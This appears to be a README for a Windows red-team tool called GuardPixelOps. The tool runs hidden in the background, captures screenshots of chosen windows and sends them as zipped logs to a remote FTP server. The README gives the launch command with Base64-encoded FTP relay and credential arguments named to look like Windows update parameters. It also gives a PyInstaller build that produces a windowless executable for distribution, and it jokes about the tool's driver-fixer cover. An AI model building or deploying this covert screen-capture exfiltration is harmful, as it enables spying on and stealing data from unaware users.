GuardPixelOps is a powerful tool designed for Red Team operations and adversary simulations. This Python script focuses on Windows environments, specifically addressing issues sending screenshots. The tool offers functionalities for capturing screenshots and insecurely sending logs to a designated FTP server.
Guardpixelops.-.Demo.mp4
GuardPixelOps.-.Demo02.mp4
Before using GuardPixelOps, please ensure that you encode the following information in Base64 format for the respective command-line arguments:
--winupdate
: Microsoft Relay Information--wintoken
: Windows Token--winversion
: Windows Version
Here's an example of how to encode information in Base64 using Python:
echo -n "your_information_here" | base64
Here's an example of how to encode information in Base64 using Powershell:
[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("your_information_here"))
- Automated Driver Fixes: GuardPixelOps identifies and fixes broken drivers in the Windows environment. OF COURSE NOT! This is a joke!
- Screenshot Capture: The tool captures screenshots of the active window when a broken driver is detected, providing visual context for analysis. (You kidding me?! It takes screenshots based on the active Window!)
- Secure Log Transmission: Logs containing information are insecurely compressed and sent to a specified FTP server for analysis.
- Background Operation: GuardPixelOps operates silently in the background, periodically sending logs at regular intervals.
- Screenshot Grabbing: Monitors the active window and captures screenshots when a specified window title is detected. The tool then saves the screenshots and logs the fixed driver information.
- Log Transmission: Compresses the fixed driver logs into a zip file and securely transmits them to a designated FTP server for further analysis.
- Background Operation: Runs as a background process, automatically sending logs at regular intervals.
To use GuardPixelOps, provide the following command-line arguments:
--winupdate
: FTP Relay information. BASE64 Encoded! 🖥️--wintoken
: Authentication User. BASE64 Encoded! 🖥️--winversion
: Credentials. BASE64 Encoded! 🖥️--regger
: Desired Window name. Plain Text
python guardpixelops.py --winupdate <FTP_Relay_information> --wintoken <Authentication_User> --winversion <Credentials> --regger <Desired_Window_name>
- Clone the repository:
git clone https://github.com/your-username/guardpixelops.git
- Install dependencies:
pip install -r requirements.txt
- Run the script:
python guardpixelops.py
To enhance portability and simplify distribution, you can compile GuardPixelOps into a standalone executable (.exe) file using PyInstaller.
Ensure you have PyInstaller installed:
pip install pyinstaller
Navigate to the directory containing guardpixelops.py and run the following command in the command prompt:
pyinstaller --clean -w -F -i NONE "guardpixelops.py" --noconsole
Now, you can distribute and run GuardPixelOps as a standalone executable without requiring Python or additional dependencies.
During the execution of GuardPixelOps, the script creates a folder structure within the WindowsFiles directory. Here's an overview:
WindowsFiles:
Updates
: Contains temporary files used during the update process.Drivers
: Contains compressed driver backup files.Logs
: The log file (logs-drivers.txt) is created in the same directory as the executable. Make sure to check the logs for important information and any error messages, LOL.
Note: Adjust the command and paths as needed based on your preferences.
GuardPixelOps is intended for educational and research purposes only. Users are responsible for complying with applicable laws and regulations.
Feel free to contribute to the project by opening issues or submitting pull requests!
👾 Happy Red Teaming with GuardPixelOps! 👾